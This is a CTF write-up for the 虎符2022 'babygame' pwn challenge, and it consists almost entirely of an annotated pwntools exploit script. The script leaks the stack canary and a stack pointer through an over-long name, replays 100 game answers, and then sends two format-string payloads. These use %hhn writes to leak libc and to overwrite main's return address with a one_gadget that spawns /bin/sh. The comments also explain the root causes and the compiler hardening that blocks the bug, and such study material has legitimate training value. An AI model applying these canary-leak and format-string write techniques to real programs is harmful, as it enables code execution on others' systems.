虎符2022

babygame

tag: fmt

fmt,利用方式太多了

exp

#coding:utf-8
# 虎符2022 (HFCTF) pwn "babygame" exploit — tag: fmt (format-string bug).
# Python 2 script: it concatenates str with p64() output, which raises
# TypeError under Python 3.
#
# Flow, as the calls below show:
#   1. send an over-long name so the echoed reply runs into the stack canary
#      and a saved stack pointer, and parse both back out;
#   2. answer 100 rounds of the game from the precomputed table `num`;
#   3. first format string: one %hhn byte write plus a %p leak of a libc pointer;
#   4. second format string: restore the canary's low byte and write the low
#      three bytes of a one_gadget over main's saved return address.
#
# Defender's view: the two root causes are an over-long name copy that is
# echoed back without a terminator (information leak) and a user-controlled
# printf format (%n write). -Wformat-security and _FORTIFY_SOURCE=2, which
# rejects %n when the format lives in writable memory, remove the write
# primitive; the leak still needs a bounded, NUL-terminated read.
from pwn import *
import time, sys, base64
import ctypes
context.os = 'linux'
context.arch = 'amd64'
# context.arch = 'i386'
context.log_level = 'debug'   # dump every send/recv on the tube

# target selector:
# 1 pro    -> local process
# 2 remote -> challenge server
# 3 127    -> local service on port 12345
debug = 1
filename = 'babygame'

if debug == 1 :
    p = process(filename)
if debug == 2:
    p = remote('node4.buuoj.cn',25323)
if debug == 3:
    p = remote('127.0.0.1',12345)
#23946

elf = ELF(filename)
libc = elf.libc   # the local loader's libc; for debug == 2 the remote libc may
                  # differ -- every offset below assumes they match

# Per-round answers for the 100 game rounds; the loop below maps each entry to
# the menu choice sent for that round (0 -> '1', 1 -> '2', 2 -> '0').
# NOTE(review): presumably the opponent's fixed (seeded) move sequence -- confirm
# against the binary.
num = [1,2,0,2,2,1,2,2,1,1,2,0,2,1,1,1,1,2,2,1,2,0,1,2,0,1,1,1,0,2,2,1,0,0,2,2,1,2,2,0,1,2,0,0,0,2,0,0,1,0,1,0,0,0,1,1,1,0,0,2,0,0,1,1,0,1,0,2,1,0,2,2,0,2,0,0,2,1,1,0,1,1,2,2,1,0,1,0,0,2,0,1,0,2,2,0,1,0,0,2]

# Breakpoint for stepping through the format-string call. This runs
# unconditionally, so it only makes sense when debug == 1 (process tube).
# gdb.attach(p,'b *$rebase(0x14F1)')
gdb.attach(p,'b *$rebase(0x000000000001449)')


# 0x109 bytes of 'a': the last one lands on the canary's low byte. The service
# echoes the name back without a terminator (inferred from the recv below), so
# the canary and the stack pointer after it come back following 0x108 'a's.
p.sendafter('your name:\n','a'*0x109)
p.recvuntil('a'*0x108)
# The canary's real low byte is 0x00; subtracting the 'a' (0x61) that
# overwrote it restores the original value.
canary = u64(p.recv(8))-0x61
# 6-byte stack pointer, zero-extended to 8 bytes before unpacking.
stack_addr = u64(p.recv(6).ljust(8,'\x00'))


# Play the 100 rounds from the answer table.
for i in range(100):
    if(num[i] == 0):
        p.sendlineafter(': \n','1')
    elif(num[i] == 1):
        p.sendlineafter(': \n','2')
    elif(num[i] == 2):
        p.sendlineafter(': \n','0')

log.success('stack_addr: '+hex(stack_addr))
log.success('canary: '+hex(canary))

# First format string.
#   - the format buffer is printf argument 6; p64(ret_addr) sits 16 bytes into
#     the payload, i.e. argument 8, so '%8$hhn' writes the running character
#     count (62 = 0x3E) into the low byte at ret_addr;
#   - 'a%27$p' prints the pointer found at argument 27, prefixed with 'a' so it
#     can be located in the reply.
# The 0x218 delta from the leaked stack pointer is specific to this binary's
# frame layout (found with the gdb breakpoint above).
ret_addr = stack_addr - 0x218

payload = '%62c' + '%8$hhn' + 'a%27$p' + p64(ret_addr)
p.sendlineafter('you.',payload)
p.recvuntil('a')
# 14 chars = '0x' + 12 hex digits; the leaked value is atoi+20 inside libc
# (presumably a return address back into atoi -- confirm in gdb).
libc_base = int(p.recv(14), 16) - libc.sym['atoi'] - 20
log.success('libc_base: ' + hex(libc_base))

# one_gadget output for the target libc, pasted verbatim as a string literal;
# 0xe3b31 is the candidate used below.
'''
0xe3b2e execve("/bin/sh", r15, r12)
constraints:
[r15] == NULL || r15 == NULL
[r12] == NULL || r12 == NULL

0xe3b31 execve("/bin/sh", r15, rdx)
constraints:
[r15] == NULL || r15 == NULL
[rdx] == NULL || rdx == NULL

0xe3b34 execve("/bin/sh", rsi, rdx)
constraints:
[rsi] == NULL || rsi == NULL
[rdx] == NULL || rdx == NULL

'''

one_gadget = libc_base + 0xe3b31
# Split the low three bytes out: each is written by its own %hhn below.
one1 = one_gadget&0xff
one2 = (one_gadget&0xff00)>>8
one3 = (one_gadget&0xff0000)>>16
print(hex(one1),hex(one2),hex(one3))
main_ret = ret_addr + 0x130        # main's saved return address (frame-specific delta)
canary_addr = stack_addr - 0x108   # canary slot whose low byte the name overwrote
log.success('one_gadget: ' + hex(one_gadget))
log.success('canary_addr: ' + hex(canary_addr))

# Second format string. Four %hhn writes whose pointers sit 0x40 bytes into the
# payload, i.e. arguments 14..17 (format buffer = argument 6, 0x40/8 = 8 words):
#   %14$hhn -> canary_addr: 0 chars printed so far, so the canary's low byte
#              becomes 0x00 again and the stack check passes
#   %15$hhn -> main_ret:    count = one1
#   %16$hhn -> main_ret+1:  count = one1 + (0x100-one1+one2) == one2 (mod 256)
#   %17$hhn -> main_ret+2:  count = ... + (0x100-one2+one3) == one3 (mod 256)
# Only the low three bytes are rewritten; presumably main's return address
# already points into libc, so its upper bytes need no change.
payload = "%14$hhn%{}c%15$hhn%{}c%16$hhn%{}c%17$hhn".format(one1,(0x100-one1+one2),(0x100-one2+one3)).ljust(0x40,'a')
payload = payload.ljust(0x40,'a')   # redundant: already padded to 0x40 above
payload += p64(canary_addr) + p64(main_ret) + p64(main_ret+1) + p64(main_ret+2)
p.sendafter('you.',payload)

p.interactive()